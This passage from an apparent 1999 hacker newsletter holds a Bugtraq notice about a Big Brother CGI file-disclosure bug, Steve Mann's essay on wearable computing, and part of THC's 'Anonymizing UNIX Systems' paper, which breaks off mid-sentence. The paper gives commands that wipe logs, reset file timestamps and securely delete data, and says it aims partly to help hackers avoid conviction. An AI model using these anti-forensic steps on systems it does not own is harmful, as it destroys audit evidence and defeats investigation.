~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 26 Apr 1999 06:49:59 -0400
From: Sean MacGuire <sean@WWW.MACLAWRAN.CA>
To: BUGTRAQ@netspace.org
Subject: FW: Security Notice: Big Brother 1.09b/c
http://www.maclawran.ca/bb/ for more info on Big Brother.
-----FW: <199904261049.GAA07967@www.maclawran.ca>-----
Date: Mon, 26 Apr 1999 06:49:59 -0400 (EDT)
>From: Sean MacGuire <sean@www.maclawran.ca>
To: solo@dok.org
Subject: Security Notice: Big Brother 1.09b/c
This notice concerns the Big Brother System and Network Monitor.
We noticed you downloaded a version which could be affected by
this problem so we wanted to tell you about it.
If you have any questions or concerns, feel free to contact me
at mailto:sean@maclawran.ca. Sorry for any inconvenience.
===========================
Big Brother Security Notice
===========================
Versions: 1.09b and 1.09c
Module: CGI History module (web/bb-hist.sh)
Affects: Anyone who's installed the new history viewer
bb-hist.sh as a CGI program.
Summary: Exploiting the problem could allow the partial
display of local files provided they are readable
by your web server, and text-based.
Fix: Please pick up a new version of the bb-hist.sh file
at: http://maclawran.ca/bb-dnld/bb-hist.sh
Found by: Michael Smith <michael@csuite.ns.ca> Thanks Michael.
I've also updated the archive to be 1.09d (this is the only
change).
--
Sean MacGuire, Reality Engineer sean@MacLawran.ca
The Big Brother Ministry of Truth http://maclawran.ca/sean
icbm --> 45'31.06N-73'35.19W +1 514 982 9688
"Looking down the barrel of another day"
--------------End of forwarded message-------------------------
@HWA
20.0 Cyborg Seeks Community
~~~~~~~~~~~~~~~~~~~~~~
May/June 1999 - Original URL - http://www.techreview.com/articles/may99/mann.htm
Cyborg Seeks Community
Meet one of the creators of wearable computing and join him in his search for like-minded folks to live in an augmented reality.
By Steve Mann
People find me peculiar. They think it�s odd that I spend most of my waking hours wearing eight or nine
Internet-connected computers sewn into my clothing and that I wear opaque wrap-around glasses day and night, inside
and outdoors. They find it odd that to sustain wireless communications during my travels, I will climb to the hotel roof to
rig my room with an antenna and Internet connection. They wonder why I sometimes seem detached and lost, but at
other times I exhibit vast knowledge of their specialty. A physicist once said he felt that I had the intelligence of a dozen
experts in his discipline; a few minutes later, someone else said they thought I was mentally handicapped.
Despite the peculiar glances I draw, I wouldn�t live any other way. I have melded technology with my person and
achieved a higher state of awareness than would otherwise be possible. I see the world as images imprinted onto my
retina by rays of light controlled by several computers, which in turn are controlled by cameras concealed inside my glasses.
Every morning I decide how I will see the world that day. Sometimes I give myself eyes in the back of my head. Other days I add a sixth sense, such as
the ability to feel objects at a distance. If I�m going to ride my bicycle, I�ll want to feel the cars and trucks pressing against my back, even when they are
a few hundred feet away.
Things appear different to me than they do to other people. I see some items as hyperobjects that I can click on and bring to life. I can choose
stroboscopic vision to freeze the motion of rotating automobile tires and see how many bolts are on the wheels of a car going over 60 miles per hour, as
if it were motionless. I can block out the view of particular objects�sparing me the distraction, for example, of the vast sea of advertising around me.
I live in a videographic world, as if my entire life were a television show. And many people assume that by living my life through the screen, I do exactly
what television leads us to do�tune out reality. In fact, WearComp has quite the opposite effect: Visual filters help me concentrate on what is
important, heightening my sensitivity and setting my imagination free. I do of course have occasion to remove my computational prostheses, as when I
sleep, shower or splash around in the ocean.
In addition to having the Internet and massive databases and video at my beck and call most of the time, I am also connected to others. While I am
grocery shopping, my wife�who may be at home or in her office�sees exactly what I see and helps me pick out vegetables. She can imprint images
onto my retina while she is seeing what I see. I hope to add to the population of similarly equipped people; last fall at the University of Toronto, I taught
what I believe to be the world�s first course for cyborgs (see sidebar �School for Cyborgs).
Much of my passion has been fueled by a desire to restore some balance of privacy in a world where individuals are increasingly affronted by
government surveillance and corporate encroachments. In fact, one goal of my work was to challenge the notion of totalitarian video surveillance�the
now-common practice of a corporate or governmental establishment wishing to know everything about everyone in the establishment while revealing
nothing about itself. Many department stores, for example, use large numbers of hidden cameras and yet prohibit customers from taking pictures.
I attempted to draw attention to this phenomenon of unreciprocated video surveillance in Shooting Back, a documentary I made during my day-to-day
life in several different countries over a period of many years. Whenever I found myself in a store or some other establishment with electronic eyes
perusing the premises, I asked its management why they were taking pictures of me without my permission. They would typically ask me why I was so
paranoid and tell me that only criminals are afraid of cameras. Of course I was covertly recording this response using my own hidden eyetap video
camera. Then I would pull an ordinary camcorder out of my satchel and give them a chance to explain their position for the record. (The camcorder
was simply a prop, of course, as the eyetap camera had been capturing the scene.) The same people who claimed that only criminals were afraid of
cameras had an instantly paranoid (and sometimes violent) reaction to my camcorder. Shooting Back was, I believe, the first documentary to be
transmitted in real time to the World Wide Web while it was shot. (Selected portions of Shooting Back may be viewed at
http://wearcam.org/shootingback.html.)
Ahead of My Time
Growing up during the 1960s and early 1970s, I always seemed to be creating things before their time. I grew up in Hamilton, Ontario�a city on the
western tip of Lake Ontario about 100 kilometers from Toronto. I came by this inclination naturally; during the early 1950s, my father had built what
was perhaps the first wearable radio. (He had pursued radio as a hobby since his childhood.) He had taught me quite a bit about electronic circuits by
the time I started kindergarten. As a young child, I removed the head from a portable battery-powered dictating machine and replaced it with the head
from a high-fidelity audio cassette deck. From this cassette transport mechanism, I built a system that enabled me to listen to music while walking
around. While many people scoffed at this invention, I found it nice to be able to drown out background music while shopping, to assert my own idea
of personal space, and to defend myself from theft of my solitude by the department stores with their Muzak.
In my teens I founded a concept of mediated reality, which I called �lightspace. The goal of lightspace was to experience an altered perception of
visual reality by exploring a large range of possible forms of illumination while observing a scene or object from different viewpoints. My work with
lightspace led to the invention of my wearable computer. My desire to create photographic instruments that would function as true extensions of my
mind and body�and my desire to control these photographic instruments in new ways�created a need for the ability to program complex sequences
of events.
I began to take this matter seriously, building a digital computer from a large number of electronic components salvaged from an old telephone switching
computer. I did much of this experimentation in the basement of a television repair shop where I spent much of my childhood as a volunteer, fixing TV
sets. In this shop I built up a great deal of knowledge about electronic circuits.
The result of my early efforts was, in the early 1970s, a family of wearable computers I called �WearComp0. Sometimes I took these cumbersome
prototypes outside in search of spaces dark enough to explore the altered perception of visual reality I could create using portable battery-powered
light sources. People would cross the street to avoid me, not knowing what to make of what must have looked to them like an alien creature. The rig
was physically a burden, weighing as much or more than I did. After wearing one of these encumbrances from sundown (when it got dark enough to
use them) to sunrise, my feet would be swollen, blistered and bleeding.
I continued to refine WearComp0 and its evolutionary successor, WearComp1. After much tinkering, I came up with WearComp2�my first system
that truly qualified as a wearable computer in the sense that it was not just a special purpose device. WearComp2 was field programmable, with a
full-function input device (a keyboard and joystick for cursor control both built into the handle of an electronic flashgun), text and graphical displays,
sound recording and playback (crude, home-brew analog-to-digital and digital-to-analog converters), and a wireless data connection to provide links
to other computers. I completed this system in 1981, before most of the world realized that computers could be portable, much less wearable.
Though an advance over my earlier prototype, WearComp2 was still a burden to lug. I wanted to reduce its bulk and make it
look more normal. This goal led me in 1982 to experiment with building components directly into clothing. I learned how to
make flexible circuits that could be embedded into ordinary fabric. This work enabled me to make versions of WearComp
that were not only more comfortable to walk around in but also less off-putting to others.
In spite of these advances, my life as a cyborg remained mostly solitary. I did connect quite literally (by serial data cable) with
an understanding woman during my freshman year at McMaster University in my hometown of Hamilton. We faced unusual
challenges in this configuration, such as having to choose which public restroom to use when we were joined. Thinking back,
I imagine we must have made a comical sight, trying to negotiate doorways without snagging the cable that tethered us
together.
Such relationships were rare, and it was seldom that I could get others to wear my seemingly strange contraptions. Many people were unable to get
past my technological shell, which they apparently found more than a little odd. Still, multimediated reality had provided me with a unique vision of the
world, and by the mid-1980s I had a following of people on the fringes of society who shared (or at least appreciated) my vision. I was invited to shoot
pictures for album covers and hair ads. By 1985, I began to realize that it wasn�t just the finished photographs people wanted; they also seemed to
enjoy watching me take the pictures. Often I would be shooting in large warehouses, with audiences of hundreds of people. I began to realize that I had
become a cyborg performance artist. By the end of the 1980s, however, I found myself yearning to return to my more substantive childhood passions
for science, mathematics and electrical engineering.
While at McMaster, I added biosensors to the WearComp so that it could monitor my heart rate (as well as the full EKG waveform) and other
physiological signals. I also invented the �vibravest�a garment studded with radar transceivers and vibrating elements. Wearing this vest made objects
at a distance feel as if they were pressing against my body. I could close my eyes and walk down the hallway, confident that any wall or other obstacle
would be felt as warning vibrations on the appropriate side of the vest. By sparing myself from the cognitive load of processing all that visual
information, I found I was able to think more clearly.
In 1991, I brought my inventions to MIT as a PhD student. As a cyborg, uprooting myself from Canada was a formidable task, since I had installed my
cyberbody in Canada over a period of many years. Going to MIT was a sudden move of my extended self.
First, I secretly climbed up onto the rooftops of buildings around the city to put in place the wireless data communications infrastructure I had brought
with me from Canada. I had to quickly deploy my base stations at the top of elevator shafts or anywhere else I could find warm dry places. This way,
whenever I wanted an Internet connection, these gateways would be ready to send the data to me, no matter where I was�even if I was in a basement
or riding on the subway.
Although I kept in touch with my family through cyberspace, my first two years at MIT were lonely times IRL�in real life. I was, after all, the only
person there with a wearable computer. Then in 1993, at the request of a fellow student, a local engineer named Doug Platt built a wearable system. I
was no longer the only cyborg at MIT.
It took some years to get other cyborgs at MIT, thus enabling the beginnings of a sense of community. Although I never succeeded in getting a large
community outfitted with my high-speed packet radio systems, the cellular telephones that began to emerge provided another answer to the problem of
connectivity.
By the end of 1995, my work was attracting serious academic interest. I was asked to write an article about my work for IEEE Computer, a
publication of the Institute of Electrical and Electronics Engineers� Computer Society. I also proposed an academic symposium on wearables and was
referred to T. Michael Elliott, executive director of the Computer Society. I figured that such a conference would legitimize the field, which until then
had consisted in many people�s minds of �Steve, that crazy guy running around with a camera on his head. Elliott was enthusiastic about the idea and in
1996 the Computer Society responded with an overwhelming �yes. This marked a turning point in my acceptance by my professional peers.
More than 700 people attended this first IEEE-sponsored symposium on wearable computing, held in Cambridge, Mass., in October 1997. A gala
�Wearables event the following day drew 3,000 people. In that same year I received my doctorate from MIT in wearable computing. This was a
gratifying culmination: I had turned a childhood hobby and passion into an MIT project, the topic of a conference, and a PhD dissertation.
This past year I returned to Canada to pursue my work at the University of Toronto. Why Toronto? I had lived there in the mid-1980s, and the city
had seemed very �cyborg-friendly. I had sensed there a cosmopolitan diversity as well as a genuine warmth and openness that contrasted with the
more cyborg-hostile and tense atmosphere of some large U.S. cities.
Wearing Well
Although I spent many years developing WearComp in relative isolation, I welcome efforts to commercialize wearable computers. At the vanguard is
Xybernaut, based in Fairfax, Va. Xybernaut�s latest model is being manufactured by Sony, indicating that the Japanese electronics giant has an interest
in what some believe will become the Walkman of computing. Last May, Xybernaut organized its own conference on wearable computing (and invited
me to give the keynote address). I may also begin to license some embodiments of my original WearComp, as well as many of my more recent
innovations, to companies who want to manufacture commercial systems. I think it will be especially important to make the cyborg outfit less
cumbersome�something that�s long been a goal of mine. My latest version is quite sleek, and looks just like ordinary bifocal eyeglasses, with the
eyetap point hidden along the cut line. Even when fully rigged, I can still play an acceptable game of squash.
I realize that some people see me and my invention as a potential threat�like the Borg of Star Trek fame: �You will be assimilated. Clearly, there are
important philosophical issues to be explored. Not only is there the danger of the technology being used to monitor people to make them into obedient
productive cyborgs, but there is also the potential that people will become too dependent on this technology. My goal as a responsible inventor and
engineer, however, has always been to encourage the development and manufacture of wearable computers as a means of personal, not institutional,
empowerment. That will make worthwhile all the obstacles and challenges I have faced during my more than 20 years of developing this technology.
I hope that if I bring WearComp to market, anyone who wishes to will eventually be able to become a cyborg. We�ll live in a collaborative
computer-mediated reality that will allow us to no longer need to distinguish between cyberspace and the real world. And then this cyborg will have lots
of company.
Steve Mann is a professor of electrical and computer engineering at the University of Toronto.
Links
Wearcomp.org: This is ground zero for Steve Mann�s world of wearable computing. It includes links to his papers and conference presentations,
as well as photos of his present and early wearable gear.
http://www.wearcomp.org/
The MIT Wearable Computing Web site. Information on MIT�s work as well as a good set of links to other organizations, both commercial and
academic.
http://wearables.www.media.mit.edu/projects/wearables/
Wearable Computer Systems at Carnegie Mellon University.
http://www.cs.cmu.edu/afs/cs.cmu.edu/project/vuman/www/home.html
Augmented reality research at Columbia University�s computer graphics and user interfaces lab.
http://www.cs.columbia.edu/graphics/
Georgia Tech wearables page.
http://wearables.gatech.edu/
International Symposium on Wearable Computers (ISWC). Archives of ISWC97 and ISWC98, and information about the upcoming ISWC99.
http://iswc.gatech.edu/
Wearables research at the University of Washington's Human Interface Technology (HIT) Lab.
http://www.hitl.washington.edu/projects/wearables/
University of Oregon�s wearable computing research group.
http://www.cs.uoregon.edu/research/wearables/Oregon/
Xybernaut�s home page.
http://www.xybernaut.com
Wearable Webcrawler: This "wearable specific search index" is a comprehensive set of links to wearable computing resources on the Web.
http://wearables.gatech.edu/webcrawler.htm
Wearables Central: Contains archives of the Usenet newsgroup comp.sys.wearables and of the mailing list Wear-Hard@haven.org.
http://wearables.blu.org/
Sidebar:
20.1 School for Cyborgs
~~~~~~~~~~~~~~~~~~
Engineering students cross the human/machine gap � or do they?
By Steve Ditlea
The black sunglasses perched on Steve Mann�s forehead provide a rare tinge of
high-tech glamour in a drab classroom in the University of Toronto�s Department of
Electrical & Computer Engineering. Wearing a ribbed red-and-gray sweater, Mann
appears, to a casual observer, quite normal. And the class he teaches��ECE 1766:
Personal Imaging and Photoquantigraphic Image Processing�seems ordinary. You�d
never know the 20 students were recruited via a campus flyer bearing the headline: YOU
WILL BE ASSIMILATED. BECOME THE WORLD�S FIRST �CYBORGS.
For anyone weaned on TV�s latter-day Star Trek series and their vision of
half-computer/half-humans losing their individuality to the collective consciousness known as the Borg, the notion of
being absorbed into a computer-mediated entity terrifies and fascinates. As the pioneering class on becoming a cyborg,
this one-semester offering for graduate students and fourth-year undergrads has attracted a smattering of casually
dressed men and one woman. The polyglot group includes students from Germany and Iran, as well as Canadians with
family ties to Asia and the Middle East. It is, in fact, the embodiment of Star Trek�s multiethnic ethos.
Wearable PCs, brick-sized, with awkward monocular head-mounted displays, rest on the desks of just two
students�the only overt sign that this may be a milestone of human-computer interaction. The wearable
computers�commercially available systems on loan from manufacturer Xybernaut�are curiosities on a campus more
familiar with notebook and palm computers. As students concentrate on their teacher�s words, no wearables are
actually in use.
Or so it seems. But look more closely at Mann and you see more than a dozen bulges straining the fabric of his striped
sweater, like some Alien-movie spawn about to burst from his body. He trails a gray cable, an old-fashioned plastic
rocker switch, some black, red and gray wires, and a miniature keyboard�items that just miss getting caught on the
edge of his desk as he paces on and off the dais. Under his sweater Mann wears a lightweight wearable computer of his
own design, wirelessly linked to the Internet and to his documents, which he can access in a screen hidden behind his
glasses. In his computer-ready state, Mann is the only cyborg in the room�the master imparting esoteric knowledge to
a new generation, knowledge that will allow them to become cyborgs, too.
For a few hours the previous week everyone in the class wore Xybernaut computers as they participated in what Mann
calls their �first project as a community of cyborgs. Linked by a few cell phones, this pod of borgs toured the campus,
capturing images using Mann�s �lightspace photographic technique.
Next week, for the course�s �open eye final exam, students are to wear Xybernauts �as an aid for calculations, as a
memory prosthesis, etc., according to the paper he hands out. Mann adds: �This may well be the world�s first exam
involving the testing of a class of cyborg entities�humans and computers, inextricably intertwined.
Grand thoughts, but here in the classroom, the cyborg vision has run into hard-edged reality. The Xybernaut systems,
designed originally for defense and industrial applications, aren�t really all that wearable�at least, not comfortably for
more than minutes at a time. �It�s bulky, it�s heavy, says fourth-year undergrad Greg Harmandayan. Classmate Daniel
Friedmann concurs: �What you wear on your waist and this head-mounted display isn�t what I thought of as being
completely wearable. Special student Stephen Ross, on a break from his full-time job, complains that �the equipment�s
battery life is too short to allow us to go online for any extended amount of time.
Not only does the hardware fall short�there are some human deficits as well. In winnowing down 40 applicants for the
class, Mann insisted on knowledge of computing fundamentals. He later explains: �I said right up front that to succeed at
this class, people better not be afraid of mathematics or of operating systems, getting down and dirty with the kernel.
Unfortunately, the students who take the class are accustomed to Windows-based computer systems, and have
required several weeks to acclimate themselves to the do-it-yourself tweaking of Linux, Mann�s operating system of
choice for his and his students� wearables. (A Xybernaut PC runs uncomfortably hot with Windows, remaining
considerably cooler with Linux�s more efficient code.) But the delay in Linux literacy slows Mann down, leaving him
unable to cover as ambitious a syllabus as he would like during limited class hours.
When Mann teaches the course this summer in an immersion-intensive form, he plans to avoid both problems. �I might
say as a prerequisite that you�ve already got to be a cyborg with your own equipment. I would take 20 or 30 people
from around the world who are already cyborgs. And when ECE 1766 starts again in the fall, Mann expects students
to be issued Xybernaut�s next generation of wearables�faster, more compact systems manufactured through an
arrangement with Sony.
For Mann, though, the computing hardware is incidental to a wider vision of �humanistic intelligence�of
computer-complemented humans in a multimedia world. �Wearable computing is meaningless in and of itself, he says.
As he sees it, the personal computing applications of wearables stressed by commercial manufacturers such as
Xybernaut are a mere subset of the visual recording, interpretation and augmentation functions of his own systems.
Having spent much of his life achieving oneness with his machine, Mann sometimes seems to forget how remarkable his
accomplishment is. �How to be a cyborg is a totally boring concept, he insists. �The fundamental mathematical basis
behind it makes it interesting. Otherwise, it�s not much of a course.
Despite the doubts about their comfort and practicality, 16 of the 20 Xybernaut computers signed out by ECE 1766
students remain at large following completion of the course. Several students are exploring the possibility of graduate
study with Mann. Almost all have been marked for life. They have been assimilated.
Steve Ditlea is a contributing writer for Technology Review.
@HWA
21.0 Anonymizing UNIX systems white paper by van Hauser/THC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---[ Anonymizing UNIX Systems ]---
version 0.7
Author: van Hauser / THC
I. THE AUDIENCE
II. GOAL
III. PREREQUISITES
IV. USER DATA
1. Sensitive user data
2. Protecting /home directories
3. Traceable user activity
4. Protecting /var/spool/mail/user files
V. SYSTEM DATA
1. Sensitive system data
2. Traceable system activity
3. Logging - important and dangerous
4. Protecting system configs
5. Computer Memory and sensitive /proc interfaces
VI. DELETE(D) DATA AND SWAP
1. How to delete files in a secure way
2. How to wipe free disk space
3. How to handle swap data
4. How to handle RAM
5. Temporary data - it is evil
VII. NETWORK CONNECTIONS
VIII. HIDING PRIVACY SETTINGS
1. Mount is your friend
2. Removable Medias
3. ???
IX. EXAMPLE CONFIGURATION AND SCRIPTS
X. FINAL COMMENTS
1. Where to get the tools mentioned in this text
2. Additional thoughts
3. Greetings (what would the world be without greets?)
4. How to contact me for updates or comments
--------------------
* I. THE AUDIENCE
This text is for any human being out there who wishes to keep their data and doings private from any snooping eye - monitoring network traffic and stealing/accessing
the computer including electronic forensics. Hackers, phreakers, criminals, members of democracy parties in totalitarian states, human rights workers, and people
with high profiles might be interested in this information. It was especially written for novice hackers so they are not so easily convicted when busted for their early
curiosity.
Thanks to Solar Designer, Fyodor, typo, tick, pragmatic, mixter and doc holiday for comments, critics and ideas.
Special thanks to rookie who had the original idea writing this paper but through personal problems couldn't do it himself.
* II. GOAL
Our goal is to provide solutions to the following statements:
(1) The solution should be simple and easy
(2) All user data should be inaccessible by anyone except their owner
(3) Nobody should be able to reconstruct what is happening on the system
Maybe you see contradictions ;-)
* III. PREREQUISITES
It is important to state the prerequisites for this project:
- The system should be secure. No remote vulnerabilities (and hopefully no local ones either)
- The system administator(s) must be trusted and willing to set this up
- The operating system to achieve this is a UNIX
Note that the solutions presented do not 100% fit internet servers.
However it's (nearly, bah ;-) perfect for enduser systems.
For the UNIX part, we show the solutions for Linux because it is the unix most easily for beginners to get their hands on and administrate.
The Linux distribution we use is the SuSE Linux Distribution 6.0
Debian is better but more complicated for beginners. And I dislike redhat for it's missing security.
You should know enough about unix (what is portmap, mount, rc2.d etc.) before trying to understand this text. It's *not* a Linux-Howto!
* IV. USER DATA
*** 1. Sensitive user data
What is sensitive user data? Well *any* data from a user account. This includes:
- utmp/wtmp/lastlog data (login times and duration plus login hosts)
- history files (what commands you typed in your session)
- your emails
- temporary files from applications like mailers, browsers etc.
- applications and their configuration
- your own data (documents, porn pics, confidental data)
- time stamps on your data (when were you accessing/editing which data)
- on multiuser systems: what users CURRENTLY are doing.. this includes process listing, and network connections as well as utmp (which is already covered
by another category). -> make proc more restrictive.
We are trying to protect all this data.
Note that utmp/wtmp/lastlog data and mail (mqueue/mail/fax/lpd) is handled in the SYSTEM DATA section.
Note that all user accounts can be seen from /etc/passwd ;-) So maybe you'd like to add some/many fake accounts, together with homedirs and crypted data ...
*** 2. Protecting /home directories
Most important for protecting user data is protecting the users' /home directories.
Each home directory must be encrypted with a strong cypher so that even with full physical access to the system the data can't be obtained. Currently I know of only
one software provididing a solution to our requirements: CFS - the cryptographic filesystem.
There are also some other crypto solutions available : TCFS, SFS and the loop filesystem with crypt support. They are faster but have got the disadvantage that
you'll have to recompile your kernel with patches from these tools. So for the sake of easeness, I stick with CFS here. (Pointers to all tools mentioned in this text can
be found at the end)
To enable CFS we must put these six lines in a rc2.d script:
portmap
rpc.mountd -P 894 # mountd should bind to port 894
cfsd 895 # cfsd should bind to port 895
rm -rf /tmp/.tmp
mkdir -p -m 700 /tmp/.tmp
mount -o port=895,intr localhost:/tmp/.tmp /home
Additionaly we have to put this entry into /etc/exports:
/tmp/.tmp localhost
Okay. This starts the sunrpc with the mountdaemon which are necessary for CFS to be started and used.
Now we need to get the following going: if a user logs on, the system has to check if he's already logged in to decide whether to decrypt the users' home directory.
This sounds hard but is easy: the user's /home/user directory doesn't exist (even if it would, because of mount command nine lines above would make it nonexistent),
so the user's HOME variable is set to '/' the root directory. Then his login shell is started which looks for it's start scripts. And that's were we put our hooks in.
We create (this example is for bash) the file /.profile with the following contents:
cattach /crypt/$USER $USER || exit 0
export HOME=/home/$USER
cd $HOME
if test -f $HOME/.profile; then
. $HOME/.profile
fi
When a user logs on the first time, this script will be executed. The user has to enter the password for his crypted homedir, and after this his correct HOME variable
is set and the normal login profile is read and done. If a user doesn't know the passphrase for his crypted homedir, he is logged out.
But how do we remove the decrypted homedir after the user logs out? This script should be clever, because a user could be logged in several times at once, and it
should only be removed when the last loginshell exits.
Thank god, this is easy too, we create a /home/user/.bash_logout script:
# if the number of user's login shells are > 3 then this is the last.
shells=`ps xu | grep -- "$USER .* S .* -[^ ]*sh" | wc -l`
test $shells -lt 3 || exit 0
export HOME=/
cd /
cdetach $USER
Thats all. From now on, the users' homedirectories are safe.
Note that a user can't login now, start a background job which writes data in his homedirectory and log out because his homedirectory would be removed. The full
.bash_logout script I provide in (see two lines below) checks for a $HOME/.keep file and if present doesn't remove the homedir.
For network logins you should keep in mind that they should not be done via rlogin, telnet, etc. because they send all traffic (including passwords) in plaintext over
the network. You should use a tool which encrypts the whole traffic like SSLtelnet or SSH (for SSH you need to set "UseLogin yes" in the /etc/sshd_config file).
You'll find all these scripts with error checking, user creating, stop scripts and config files etc. in section IX. EXAMPLE CONFIGURATION
Note that we started daemons in the section which can be contacted from remote. If you don't want this (because there are no external users who need to mount
their crypted user data on their own machine) you should firewall these ports. Look in you manpages ("man ipchains" or "man ipfwadm").
*** 3. Traceable user activity
[Warning, this section shows first how to perform simple electronic forensics]
It is easy to see who logged on the system and what he did by the timestamps. Even if all your data is crypted, by checking the last access time (atime) of your files,
someone may check when you logged in last time, for what duration and if you were idleing or doing much stuff.
If the systems doesn't have many users, someone might even tell what you did.
Example: The earliest access time for a crypted file in your homedir can be seen by:
ls -altur /crypt/$USER | head -1 # shows the logout file
ls -altu /crypt/$USER | more # with some brain you'll find
# the login time
then you also have the duration of the session.
By checking the change/modification and access time of those crypted files with their timestamps someone can see how hard you were working, and get more
conclusions (e.g. if many files nested in a three levels deep directory where modified this is probably a browser - so you were surfing the net).
This insight will now make it possible to check what commands were run:
Let's say the login time as 22 hours ago, so you run:
find / -type f -atime 0 -ls # shows the accessed files
find / -type f -mtime 0 -ls # shows the modified files
(this can be done with directories too)
Now check the output for the correct timeframe and analyze what you found. e.g. the telnet client was accessed. So it's probable, the user used it to connect to
another system. I think you can imagine now what is possible.
To protect against this is also very easy:
Create the file /usr/local/bin/touch_them and make it executable with the following contents:
find /crypt /tmp /etc /var/spool 2> /dev/null | xargs -n 250 touch
Then put the following line into /etc/crontab:
50 * * * * root /usr/local/bin/touch_them
finally you change the 4th row of all lines in /etc/fstab which have the keyword "ext2" in their third (the filesystem type) row:
defaults (or anything else)
should become
defaults,noatime (the old value is kept, and noatime is appended)
example:
/dev/hda1 / ext2 defaults 1 1
becomes
/dev/hda1 / ext2 defaults,noatime 1 1
What did we achieve? The crontab entry with the small script updates the atime, mtime and ctime to the current time every hour of special directories - especially
those which may hold user data.
The mount options we changed now prevent the update of the atime. However, this needs a current 2.2.x kernel - it isn't implemented on the 2.0 kernel tree!
*** 4. Protecting /var/spool/* files
/var/spool/mail :
Now it gets tricky. How can we protect the new mail for a user from spying eyes? It can't be sent directly to a user's homedir like qmail would do because it's
crypted. The easiest solution is to use pgp to encrypt your outgoing emails and tell all your friends that they should also encrypt all emails to you.
However, this is not satisfying. An attacker can still see who sent the user the email. The only possibility to hide this is using anonymous remailer. This is not a great
solution, so this is an open point (see section X.2: Additional thoughts)
/var/spool/{mqueue|fax|lpd} :
Well, all you can do is try to flush the queues when shutting down.
After that you have to decide if you delete the remaining files in a secure way or leave it where it is. Or program a special script which does something with the data
(like taring the data and encrypting it with pgp, doing the reverse when the system is rebooted)
You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time.
* V. SYSTEM DATA
*** 1. Sensitive system data
What is sensitive system data? *Anything* which gives conclusion on incoming and outgoing data, configuration files, logs, reboots and shutdowns.
This includes:
- utmp/wtmp/lastlog data (boot, reboot, shutdown times + user times)
- ppp dialup script
- sendmail and tcp wrapper configurations
- proxy cache data (e.g. squid web/ftp proxy)
- syslog messages
- /var/spool/* data {mqueue|fax|lpd|mail}
- temporary files from daemons
- time stamps on data (when were what data accessed/edited)
How to prevent time stamp forensica, see section IV.3
How to protect /var/spool/* data, see section IV.4 for an incomplete solution.
*** 2. Traceable system activity
(prevent of time stamp forensic is handled in section IV.3) To trace system activity, you can easily check temporary files of daemons and applications. Some of them
write to /tmp, root applications usually (should) write to /var/run. We handle this together with section V.3: Logging. All you have to do is this, and only *once* :
cd /var
mv run log
ln -s log/run run
this moves the /var/run directory to /var/log/run and sets a symlink in it's former place so that applications still find their files.
*** 3. Logging - important and dangerous
Logging is important to trace problems like misconfigurations.
Logging is dangerous because an attacker can see important data in the logfiles, like the user's login and logout time, if they executed "su" or other commands etc.
We try to find a balance between this.
Our solution: Write all log data to one special directory.
This directory is a RAM disk so the data is lost after a system shutdown. Ensure that syslogd [/etc/syslog.conf] and daemons (e.g. httpd [apache]) only write to our
special logging directory or a system console. /var/log should be used as our special logging directory.
Now we put the following commands into /sbin/init.d/boot.local:
umask 027
mke2fs -m0 /dev/ram0 1> /dev/null 2>&1
rm -rf /var/log/* 2> /dev/null
mount -t ext2 /dev/ram0 /var/log
chmod 751 /var/log
cd /var/log
mkdir -m 775 run
chgrp uucp run
for i in `grep /var/log /etc/syslog.conf|grep -v '^#'| \
awk '{print $2}'|sed 's/^-//'`
do > $i ; done
umask 007 # 002 might be used too.
for i in run/utmp wtmp lastlog
do > $i ; chgrp tty $i ; done
cd /
kill -HUP `pidof syslogd` 2> /dev/null
After your next reboot it behaves like described above.
Some of you will not like the idea of having no logs after a reboot. This way you can't trace an intruder or guess from your logs what crashed the machine. Either you
can tar the files and pgp before the shutdown is complete (but the data would be lost if a crash occurs), or you might also use ssyslog or syslog-ng, special syslogs
with crypting capabilities, and write the data you really want to keep to (just an example) /var/slog.
You can also create a whole crypted /var partition, but that would require someone at the console while booting the system - every time.
*** 4. Protecting system configs
This is tricky. It is easy to achieve but for a price. If we create an account with uid which has his homedir in /home and is hence protected by our CFS configuration,
you need to be at the console at every reboot. This isn't practical for server systems that need to be administrated and rebooted remotely. This solution is only good
for end-user pcs.
Just create an account with the uid 0 (e.g. with the login name "admin"). You can use the create_user script from section IX.
Put all your sensitive configuration files you want to protect into this directory (ppp dialup scripts, sendmail.cf configs, squid configs with their cache directory set to a
subdir of "admin" etc.)
Now create a small shellscript which starts these daemons with a command line option to use the config files in your "admin" homedir.
Your system is then secure from extracting the sensitive information from the config files. But for a price. You have to log in after each reboot as user "admin", enter
your CFS passphrase and start the script.
*** 5. Computer Memory and sensitive /proc interfaces
For a real multiuser system on which the administrator want additionally ensure the privacy of the user online, he has to hide the user process information, a user
would normally see when issuing a "who" or "ps" command. To protect the user's process information, you can use Solar Designer's secure-linux kernel patch. To
protect the utmp/wtmp/lastlog we ensure that these files are only readable by root and group tty, hence a normal user can't access this data. (This is done in the
boot.local example script)
Now one problem is left. Even with normal RAM a well funded organisation can get the contents after the system is powered off. With the modern SDRAM it's
even worse, where the data stays on the RAM permanently until new data is written. For this, I introduced a small tool for the secure_delete package 2.1, called
"smem" which tries to clean the memory. This one should be called on shutdown. It is done in the example in section VI.4
* VI. DELETE(D) DATA AND SWAP
*** 1. How to delete files in a secure way<
When a file is deleted, only the inode data is freed, the contents of the data is NOT wiped and can be gathered with tools like "dd" or the tool manpipulate_data
from THC.
Peter Gutmann wrote a paper with the name "Secure Deletion of Data from Magnetic and Solid-State Memory" presented 1996 at the 6th Usenix Security
Symposium. This is the best civilian paper on how to wipe data in a way that it is hard for even electronic microscopes to regain the data.
There are four tools out there which uses the techniques described there, two called "wipe", one called "srm" from THC's secure_delete package and "shred" which
is part of the new fileutil package from GNU.
Ours is still the best from it's design, features and security, and it has also all important and advanced commandline options and speed you need.
To use one of these tools for deletion just set an alias in /etc/profile:
alias rm=srm # or wipe or shred
or even better, move /bin/rm to /bin/rm.orig and copy the secure delete program to /bin/rm. This ensures, that all data which is deleted via rm is securely wiped.
If you can't install THC's secure_delete package or any other (for any reason) you can also set the wipe flag from the ext2 filesystem on files you wish to wipe before
rm'ing them. It's nearly the same, but it's NOT a secure wipe like mentioned above. It's set by:
chattr +s filename(s)
[Note that it is *still* possible for a well funded organisation to get your data. Don't rely on this! See section VI.4 !]
*** 2. How to wipe free disk space
Most times applications like the editor in your mail program write a temporary file. And you don't know about it - you weren't even asked :( Because they don't wipe
